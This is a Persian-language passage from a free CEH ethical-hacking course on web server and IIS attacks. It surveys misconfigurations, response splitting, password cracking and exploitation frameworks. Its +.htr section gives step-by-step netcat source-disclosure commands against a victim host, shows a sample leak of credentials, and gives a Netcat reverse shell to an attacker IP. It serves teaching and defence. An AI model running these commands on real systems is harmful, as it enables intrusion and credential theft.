برای مطالعه قسمت قبل آموزش رایگان دوره CEH اینجا کلیک کنید.
حملات مرد میانی
حملات man-in-the-middle با هدف قرار گرفتن میان کلاینت و سرور و جمعآوری یا تغییر اطلاعات پیادهسازی میشوند. ابزارهایی شبیه به Burp Proxy برای پیادهسازی یک چنین حملاتی استفاده میشوند.
تغییر ظاهر وبسایت
تغییر ظاهر وبسایت حمله دیگری است که برای اعمال تغییراتی در رابط کاربری یک وبسایت پیادهسازی میشوند. حدس زدن گذرواژه، سوءاستفاده از آسیبپذیری و حتا تزریق SQL روشهای متداول در پیادهسازی این مدل حملات هستند. امروزه این مدل حملات به اشکال مختلف پیادهسازی میشوند و جالب آنکه در سال 2014 شکل ظاهری صفحه اصلی سازمان EC-Council قربانی این حمله شد. در حمله فوق هکرها تصویری از گذرنامه ادوارد اسنودن را در صفحه اصلی سایت قرار دادند. برای اطلاعات بیشتر در خصوص کم و کیف این حمله به آدرس زیر مراجعه کنید.
https:// www.scmagazine.com/ec-council-website-defaced-by-hacker/article/538697/
سوء استفاده از پیکربندی اشتباه وبسرور
پیکربندی اشتباه وبسرور یکی دیگر از بردارهای حمله متداول است. یک نمونه در این زمینه فایل httpd.conf است:
<location /server-status>
SetHandler server-status
</Location>
این فایل پیکربندی به هر کاربری امکان مشاهده صفحه وضعیت سرور را میدهد که حاوی اطلاعات دقیقی در مورد استفاده فعلی از وبسرور است. دیگر فایل php.ini است که در بسیاری از وبسرورها وجود دارد. در صورت استفاده از این فایل همراه با پیکربندی اشتباه توضیحات کاملی در مورد پیامهای خطای اشتباه ارائه میدهد:
display_error = on
log_errors = on
Error_log = syslog
ignore_repeated_errors = Off
شکاف در پاسخدهی HTTP
شکاف در پاسخدهی HTTP امکانپذیر است، زیرا برنامه یا محیط مقادیر ورودی را به درستی و مطابق با استانداردهای مربوطه تنظیم نکردهاند. شکاف در پاسخدهی HTTP به دلیل عدم اعتبارسنجی ورودی کاربر و ناتوانای در تشخیص کاراکترهای CR و LF امکانپذیر است:
CR = %0d = \r
LF = %0a = \n
برای پیشگیری از بروز آسیبپذیری شکاف در پاسخدهی HTTP، تمامی فرمهای کدگذاری شده باید از الگوی تجزیه کننده رشتههای کاراکتری CR LF \r\n %0d%0a استفاده کنند.
شکستن گذرواژههای وبسرور
احراز هویت نقش مهمی در امنیت وبسایتها ایفا میکند. ممکن است بخشهایی در یک سایت وجود داشته باشند که باید محدود شوند یا دسترسی به محتوای محرمانه یا حساس برای هر فردی امکانپذیر نباشد. روشهای مختلف زیادی برای تأیید اعتبار کاربران وجود دارد. احراز هویت میتواند شامل حالتی باشد که شما در قالب نام کاربری و رمزعبور آنرا میشناسید، حالتی باشد که در قالب توکن یا کارت هوشمند آنرا میشناسید یا حتا حالت هایی شبیه به اثر انگشت، اسکن شبکیه یا تشخیص صدا باشد. تأیید اعتبار با رمزهای عبور یکی از رایجترین شکلهای تأیید اعتبار و همچنین ضعیفترین آنها است. به عنوان نمونه، وردپرس یکی از محبوبترین سیستمعاملهای وبلاگنویسی در جهان است و حدود 20 درصد از کل وبسایتهای حال حاضر بر مبنای آن ساخته شدهاند.
هکرها میتوانند از ابزاری مانند WPScan برای اسکن وبسایتهای وردپرسی با حدود 500 مورد از رایجترین رمزهای عبور استفاده کرده و در کمتر از یک دقیقه به سایت دسترسی پیدا کنند. هکرها میتوانند فرآیند شکستن گذرواژهها را در مورد هر صفحه تأیید اعتبار وبسایتی پیادهسازی کنند. اگر به دنبال فهرستی از رمزهای عبور مشترک هستید آدرس زیر اطلاعات کاملی در این ارتباط در اختیارتان قرار میدهد.
https://wiki.skullsecurance.org/Passwords
اکنون که ما حملات متداول وبسرورها را پوشش دادهایم، اجازه دهید به برخی از آسیبپذیریرهای خاص وجود در سرور IIS مایکروسافت نگاهی داشته باشیم.
آسیبپذیریهای IIS
نسخه 8.5 سرور IIS پیشرفتهای چشمگیری نسبه به نسخههای قدیمیتر داشته و ایمنتر از آنها شده است. صرف نظر از نسخه، وبسرورها هنوز هم میتوانند هدف قرار گیرند. در این بخش به تعدادی از آسیبپذیریهای مطرح IIS که روزگاری سرتیتر اخبار بودند نگاهی خواهیم داشت.
حملات همواره اتفاق میافتند، بنابراین درک درست این موضوع که هکرها چگونگه موفق به سوءاستفاده از آسیبپذیریها شده و یک حمله واقعی را پیادهسازی کردهاند مهم است. یک نمونه از این بردارها حمله سرریز بافر ISAPI DLL است. اهداف بهرهبرداری از idq.dll بود. هنگام اجرا، این حمله میتواند به یک سرریز بافر منجر شود که در نهایت سرورهایی که IIS را اجرا میکنند را با خطر جدی روبرو کند. آنچه این آسیبپذیری را به شدت مخرب میکند این است که سرویس بخشی از IIS Indexing بوده و حتی نیازی به اجرای فعال نیست. از آنجایی که idq.dll در قالب یک فرآیند سیستمی اجرا میشود، مهاجم میتواند به راحتی امتیاز خود را افزایش داده و خود را به عنوان یک مدیر تعریف کند.
حملات افشای منبع را میتوان برای کشف رمزهای عبور، طراحی وب یا منطق تجاری استفاده کرد. یک نمونه از این آسیبپذیریها، آسیبپذیری WebDAV است. این حمله آسیبپذیری موجود در نسخههای IIS 5.1 / 6.0 را هدف قرار داده و کاربران اجازه میدهد با پوشه حاوی گذرواژه بتوانند به پوشههای امن WebDAV دسترسی پیدا کنند. از اسکریپت Nmap میتوان برای بررسی این آسیبپذیری استفاده کرد. اسکریپت زیر این موضوع را نشان میدهد:
nmap --script http-iis-webdav-vuln -p80,8080 <host>
حمله افشای دیگر در ارتباط اب سوء استفاده از +.htr است. به دلیل آسیبپذیری موجود در ISM.dll ، IIS4 ، IIS5 و IIS6 میتوان دادههای منبع را فاش کرد. یک مهاجم با الصاق +.htr به فایل global.asa قادر به انجام اینکار است. Netcat میتواند به بهرهبرداری از این آسیبپذیری کمک کند. کافی در ابتدا فایل متنی مشابه حالت زیر را ایجاد کرده و نام آنرا htr.txt بگذارید:
GET /victims_address/global.asa+.htr HTTP/1.0
CR
CR
در مرحله بعد فرمان زیر را اجرا کنید:
nc -vv www.victim.com 80 < htr.txt
اگر سایت آسیبپذیر باشد، هکر اطلاعاتی شبیه به حالت زیر دریافت میکند:
HTTP/1.1 200 OK
Server: Microsoft -IIS /6.0
Date: Wed, 11 Feb 2015 00:32:12 GMT
<!--filename = global.asa -->
("Profiles_ConnectionString")= "DSN=Profiles; UID=User;
password=secret"
("LDAPUserID") = "cn=Admin"
("LDAPPwd") = "p@ssw0rd"
در آخرین مرحله هکر باید پوستهای را با استفاده از Socat یا Netcat آماده کند. اکنون تنها کاری که مهاجم باید انجام دهد بهکارگیری Netcat برای بازگرداندن یک پوسته فرمان با مجوزهای سیستمی روی کامپیوتر خودش است که عملیات در قالب دو دستور زیر اجرا می شوند:
1. اجرای فرمان از طریق کامپیوتر هکر:
nc.exe -l -p <Open Port>
2. اجرای فرمان زیر از طریق سرور IIS قربانی که cmdasp.asp را بارگذاری میکند.
nc.exe -v -e cmd.exe AttackerIP <Open Port>
وصله کردن سرورهای آسیبپذیری بهترین روش مقابله با این تهدیدات است. فقط بهخاطر داشته باشید که حتا سرورهای بهروزتری شبیه به ویندوز 2012 که از نسخه IIS 8.x استفاده میکنند ممکن است در برابر چنین حملاتی آسیبپذیر باشند. همچنین ممکن است مهاجم فراتر از وبسرور گام برداشته و به سراغ سرویسها یا برنامههای کاربردی برود که روی سیستم در حال اجرا هستند. عوامل دیگری نیز به هکرها اجازه میدهند در کار خود موفق شوند که از آن جمله به موارد زیر میتوان اشاره کرد:
عدم استفاده از رمزگذاری: ارتباطات مبتنی بر HTTP باعث میشوند تا اطلاعات مبادله توسط سرور در قالب یک متن ساده مبادله شوند.
بهکارگیری نسخه غیر ایمنی از الگوریتم رمزنگار: اگر SSL نسخه 3 فعال باشد، ممکن است راه برای پیادهسازی گونه خاصی از حمله مرد میانی بهنام POODLE سرنامPadding Oracle on Downgraded Legacy هموار شود. اسکریپت Nmap زیر برای تشخیص این آسیبپذیری استفاده میشود:
nmap -sV --version-light --script ssl-poodle -p 443 <host>
اجازه برای اسکریپتنویسی cross-frame: این کار ممکن است در نهایت با فریب کاربران همراه باشد تا روی لینکی که تصور میکنند معتبر است کلیک کنند، در حالی که لینک با استفاده از کدهای مخرب جاوااسکریپت و با یک iframe آلوده شدهاند تا کلیکهای کاربر روبایش شده و در نهایت صفحات مخرب برای کاربر بارگذاری شوند. صفحاتی که با هدف سرقت اطلاعات شخصی کاربران طراحی شدهاند.
فقط به یاد داشته باشید که با اجرای هر یک از این حملات، فعالیتهای انجام شده توسط مهاجمان در فایلهای گزارش ثبت میشود. بنابراین، انتظار میرود تا هکر به دنبال حذف یا تغییر فایلهای گزارش باشد. اگر ورود به سیستم فعال باشد به احتمال زیاد آدرس آیپی مهاجم ضبط میشود.
نکته: یک ابزار هک در این زمینه WFetch است. ابزار فوق به هکر اجازه میدهد تا درخواستهای HTTP را بهطور کامل سفارشی کرده و به آزمایش این موضوع بپردازد که وبسرور چه واکنشی را به درخواستهای سفارشی میدهد.
سرانجام، بهخاطر داشته باشید که فقط وبسرورها نیستند که در برابر حملات آسیبپذیر هستند. هر سرویسی که یک کاربر یا هکر بتواند به آن دسترسی داشته باشد ممکن است یک هدف بالقوه باشد. به همین دلیل هکرها ممکن است از ابزارهایی مانند Metasploit برای اجرای حملات سرریز بافر استفاده کنند.
ابزارهای بهرهبرداری خودکار
از ابزارهای بهرهبرداری خودکار نیز میتوان برای حمله به وبسرورها استفاده کرد. این ابزارها به هکرها امکان میدهند به سوء استفاده از برخی موارد مشکوک به آسیبپذیری استفاده کنید. این ابزارها در واقع میتوانند قابلیت بهرهبرداری با یک کلیک را ارائه دهند. Metasploit احتمالاً شناخته شدهترین نمونه از ابزارها در زمینه بهرهبرداری از آسیبپذیریها است. Metasploit به شما امکان میدهد تا یک آدرس آیپی و شماره پورت یک دستگاه هدف را وارد کرده، اکسپلویت انتخاب شده را روی ماشین قربانی به سادهترین شکل پیادهسازی کنید. ابزار فوق میتواند قربانی را به شما متصل کرده و یک پوسته فرمان روی سامانه قربانی باز کرده یا به شما امکان دهد کدی را روی سامانه قربانی اجرا کنید. بعد از اینکه روی قربانی پوستهای ایجاد کردید، تنها چند قدم کوتاه فاصله دارید تا حساب کاربری خود را به یک کاربر ممتاز ارتقا دهید.
یکی دیگر از ابزارهای بهرهبرداری خودکار، چارچوب بهرهبرداری از مرورگر BeEF است. BeEF یک چارچوب بهرهبرداری قدرتمند است که برای ارزیابی وضعیت امنیتی یک هدف متمرکز و بهرهبرداری از آسیبپذیریهای مرورگرها ساخته شده است. همانگونه که بسیاری از کارشناسان تست نفوذ از پروکسیهایی مانند Burp Proxy و OWASP Zed Application Proxy استفاده میکنند، BeEF با هدف قرار دادن مستقیم مرورگر وب اینکار را انجام میدهد.
هکرها از رخنههای موجود در مرورگرها به عنوان روشی برای ویرایش یکسری تنظیمات خاص بدون اطلاع کاربر استفاده میکنند. چارچوب BeEF به کارشناسان تست نفوذ اجازه میدهد تا ماژولهای خاصی را انتخاب کنند تا هر یک مرورگرها را بر مبنای رویکردهای مختلف آزمایش کنند. ابتدا یک هدف انتخاب میشود. پس از انتخاب هدف، کاربر میتواند ماژول خاصی را که برای حمله استفاده میشود بارگذاری کند. منطقه Load Modules نشان میدهد که ماژولها برای بهرهبرداری در دسترس هستند. پس از انتخاب یک ماژول، امکان ارسال کد به مرورگر هدف فراهم میشود. پس از بارگذاری ماژول امکان بهرهبرداری از آسیبپذیریها وجود دارد.
بهطور مثال، از یک ماژول میتوان برای هدف قرار دادن روشی که کامپیوترهای اپل در زمان شروع یک مکالمه مبتنی بر اسکایپ از آن استفاده بهره برد. مکالمهای که بر مبنای یک آدرس اینترنتی غیر ایمن انجام میشود. در صورت موفقیتآمیز بودن حمله، BeEF بدون اجازه کاربر نهایی، تماس با اسکایپ را آغاز میکند. مثال فوق تنها گوشهای از قابلیتهای چهارچوب BeEF است، اما قدرت این ابزار به مراتب فراتر از مثال فوق است، بهگونهای که متخصصان امنیتی و کارشناسان تست نفوذ میتوانند از آن برای آزمایش آسیبپذیریهای سمت کلاینت استفاده کنند. سایر ماژولها شامل سرریزهای مرورگر، اسکریپت cross-site، روبایش کلیدها و روبایش محتوای کلیپبورد است. فقط بهخاطر داشته باشید که این ابزارها میتوانند برای هدف قرار دادن برنامههای وب و پایگاههای داده نیز استفاده شوند. از دیگر ابزارهای بهرهبرداری خودکار به موارد زیر میتوان اشاره کرد:
■ Canvas: یک ابزار حمله و نفوذ خودکار است که از نشانی https://immunityinc.com/ قابل دریافت است. ابزار فوق به زبان پایتون نوشته شده و به شکل پرتابل قابل اجرا روی ویندوز و لینوکس است. Canvas یک ابزار تجاری است که توانایی حمله و نفوذ را به متخصصان امنیتی میدهد. Canvas همانند Metasploit یک ابزار کامل نیست و نمیتواند کشف اولیه انجام دهد، بنابراین باید اهداف خود را به صورت دستی به آن اضافه کنید. با اینحال به نسبت Metasploit پیشرفتهتر بوده و برای استفاده از آن باید مجوز مربوطه به آنرا خریداری کنید. بهطور کلی یک ابزار درجه یک برای افرادی است که تجربهای در زمینه نفوذ و ارزیابی دارند.
■ core Impact: مجموعهای متشکل از ابزارهای پیشرفته آزمایش تست نفوذ تجاری است که از آدرس زیر قابل دریافت است.
https://www.coresecurance.com/core-impact
core impact ابزاری برای بهرهبرداری و ارزیابی اکسپلویتها و مشکل روبایشک کلیکها است. core impact این یک بسته کامل است که قدم به قدم به کاربر اجازه میدهد فرآیند اسکن را آغاز کرده و به تاریج به سراغ فازهای شناسایی و بهرهبرداری از اکسپلویتها برود. یکی از ویژگیهای منحصر به فرد این محصول این است که از ویژگی چرخش محوری پشتیبانی میکند که از نظر اصولی این امکان را فراهم میآورد که از یک ماشین به خطر برای نفوذ به ماشین دیگری استفاده کرد. این ابزار هم برای افراد تازهکار و هم برای متخصصان امنیت مفید است.
در شماره آینده مبحث فوق را ادامه میدهیم.
برای مطالعه رایگان تمام بخشهای دوره CEH روی لینک زیر کلیک کنید:
ماهنامه شبکه را از کجا تهیه کنیم؟
ماهنامه شبکه را میتوانید از کتابخانههای عمومی سراسر کشور و نیز از دکههای روزنامهفروشی تهیه نمائید.
ثبت اشتراک نسخه کاغذی ماهنامه شبکه
ثبت اشتراک نسخه آنلاین
کتاب الکترونیک +Network راهنمای شبکهها
- برای دانلود تنها کتاب کامل ترجمه فارسی +Network اینجا کلیک کنید.
کتاب الکترونیک دوره مقدماتی آموزش پایتون
- اگر قصد یادگیری برنامهنویسی را دارید ولی هیچ پیشزمینهای ندارید اینجا کلیک کنید.
نظر شما چیست؟